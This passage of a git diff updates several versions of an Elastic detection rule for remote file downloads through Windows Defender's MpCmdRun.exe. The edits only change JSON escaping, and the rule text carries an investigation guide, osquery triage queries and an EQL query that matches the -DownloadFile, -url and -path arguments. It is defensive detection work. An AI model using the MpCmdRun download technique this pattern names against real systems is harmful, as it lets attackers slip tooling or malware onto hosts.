Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Remote File Download via MpCmdRun\n\nAttackers commonly transfer tooling or malware from external systems into a compromised environment using the command and control channel. However, they can also abuse signed utilities to drop these files.\n\nThe `MpCmdRun.exe` is a command-line tool part of Windows Defender and is used to manage various Microsoft Windows Defender Antivirus settings and perform certain tasks. It can also be abused by attackers to download remote files, including malware and offensive tooling. This rule looks for the patterns used to perform downloads using the utility.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check the reputation of the domain or IP address used to host the downloaded file.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name : \"MpCmdRun.exe\" or process.pe.original_file_name == \"MpCmdRun.exe\") and\n process.args : \"-DownloadFile\" and process.args : \"-url\" and process.args : \"-path\"\n", "references": [ "https://twitter.com/mohammadaskar2/status/1301263551638761477", @@ -59,7 +59,7 @@ ], "risk_score": 47, "rule_id": "c6453e73-90eb-4fe7-a98c-cde7bbfc504a", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -72,7 +72,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/c6453e73-90eb-4fe7-a98c-cde7bbfc504a_106.json b/packages/security_detection_engine/kibana/security_rule/c6453e73-90eb-4fe7-a98c-cde7bbfc504a_106.json index 71679804a8c..6cfddaabc49 100644 --- a/packages/security_detection_engine/kibana/security_rule/c6453e73-90eb-4fe7-a98c-cde7bbfc504a_106.json +++ b/packages/security_detection_engine/kibana/security_rule/c6453e73-90eb-4fe7-a98c-cde7bbfc504a_106.json @@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Remote File Download via MpCmdRun", - "note": "## Triage and analysis\n\n### Investigating Remote File Download via MpCmdRun\n\nAttackers commonly transfer tooling or malware from external systems into a compromised environment using the command and control channel. However, they can also abuse signed utilities to drop these files.\n\nThe `MpCmdRun.exe` is a command-line tool part of Windows Defender and is used to manage various Microsoft Windows Defender Antivirus settings and perform certain tasks. It can also be abused by attackers to download remote files, including malware and offensive tooling. This rule looks for the patterns used to perform downloads using the utility.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check the reputation of the domain or IP address used to host the downloaded file.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Remote File Download via MpCmdRun\n\nAttackers commonly transfer tooling or malware from external systems into a compromised environment using the command and control channel. However, they can also abuse signed utilities to drop these files.\n\nThe `MpCmdRun.exe` is a command-line tool part of Windows Defender and is used to manage various Microsoft Windows Defender Antivirus settings and perform certain tasks. It can also be abused by attackers to download remote files, including malware and offensive tooling. This rule looks for the patterns used to perform downloads using the utility.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check the reputation of the domain or IP address used to host the downloaded file.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name : \"MpCmdRun.exe\" or process.pe.original_file_name == \"MpCmdRun.exe\") and\n process.args : \"-DownloadFile\" and process.args : \"-url\" and process.args : \"-path\"\n", "references": [ "https://twitter.com/mohammadaskar2/status/1301263551638761477", @@ -59,7 +59,7 @@ ], "risk_score": 47, "rule_id": "c6453e73-90eb-4fe7-a98c-cde7bbfc504a", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/c6453e73-90eb-4fe7-a98c-cde7bbfc504a_107.json b/packages/security_detection_engine/kibana/security_rule/c6453e73-90eb-4fe7-a98c-cde7bbfc504a_107.json index bbccab88cb0..ff949705877 100644 --- a/packages/security_detection_engine/kibana/security_rule/c6453e73-90eb-4fe7-a98c-cde7bbfc504a_107.json +++ b/packages/security_detection_engine/kibana/security_rule/c6453e73-90eb-4fe7-a98c-cde7bbfc504a_107.json @@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Remote File Download via MpCmdRun", - "note": "## Triage and analysis\n\n### Investigating Remote File Download via MpCmdRun\n\nAttackers commonly transfer tooling or malware from external systems into a compromised environment using the command and control channel. However, they can also abuse signed utilities to drop these files.\n\nThe `MpCmdRun.exe` is a command-line tool part of Windows Defender and is used to manage various Microsoft Windows Defender Antivirus settings and perform certain tasks. It can also be abused by attackers to download remote files, including malware and offensive tooling. This rule looks for the patterns used to perform downloads using the utility.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check the reputation of the domain or IP address used to host the downloaded file.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Remote File Download via MpCmdRun\n\nAttackers commonly transfer tooling or malware from external systems into a compromised environment using the command and control channel. However, they can also abuse signed utilities to drop these files.\n\nThe `MpCmdRun.exe` is a command-line tool part of Windows Defender and is used to manage various Microsoft Windows Defender Antivirus settings and perform certain tasks. It can also be abused by attackers to download remote files, including malware and offensive tooling. This rule looks for the patterns used to perform downloads using the utility.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check the reputation of the domain or IP address used to host the downloaded file.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name : \"MpCmdRun.exe\" or process.pe.original_file_name == \"MpCmdRun.exe\") and\n process.args : \"-DownloadFile\" and process.args : \"-url\" and process.args : \"-path\"\n", "references": [ "https://twitter.com/mohammadaskar2/status/1301263551638761477", @@ -59,7 +59,7 @@ ], "risk_score": 47, "rule_id": "c6453e73-90eb-4fe7-a98c-cde7bbfc504a", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -72,7 +72,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/c6453e73-90eb-4fe7-a98c-cde7bbfc504a_108.json b/packages/security_detection_engine/kibana/security_rule/c6453e73-90eb-4fe7-a98c-cde7bbfc504a_108.json index 1b4dbcacc6c..4a83ba54a12 100644 --- a/packages/security_detection_engine/kibana/security_rule/c6453e73-90eb-4fe7-a98c-cde7bbfc504a_108.json +++ b/packages/security_detection_engine/kibana/security_rule/c6453e73-90eb-4fe7-a98c-cde7bbfc504a_108.json @@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Remote File Download via MpCmdRun", - "note": "## Triage and analysis\n\n### Investigating Remote File Download via MpCmdRun\n\nAttackers commonly transfer tooling or malware from external systems into a compromised environment using the command and control channel. However, they can also abuse signed utilities to drop these files.\n\nThe `MpCmdRun.exe` is a command-line tool part of Windows Defender and is used to manage various Microsoft Windows Defender Antivirus settings and perform certain tasks. It can also be abused by attackers to download remote files, including malware and offensive tooling. This rule looks for the patterns used to perform downloads using the utility.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check the reputation of the domain or IP address used to host the downloaded file.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", + "note": "## Triage and analysis\n\n### Investigating Remote File Download via MpCmdRun\n\nAttackers commonly transfer tooling or malware from external systems into a compromised environment using the command and control channel. However, they can also abuse signed utilities to drop these files.\n\nThe `MpCmdRun.exe` is a command-line tool part of Windows Defender and is used to manage various Microsoft Windows Defender Antivirus settings and perform certain tasks. It can also be abused by attackers to download remote files, including malware and offensive tooling. This rule looks for the patterns used to perform downloads using the utility.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check the reputation of the domain or IP address used to host the downloaded file.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 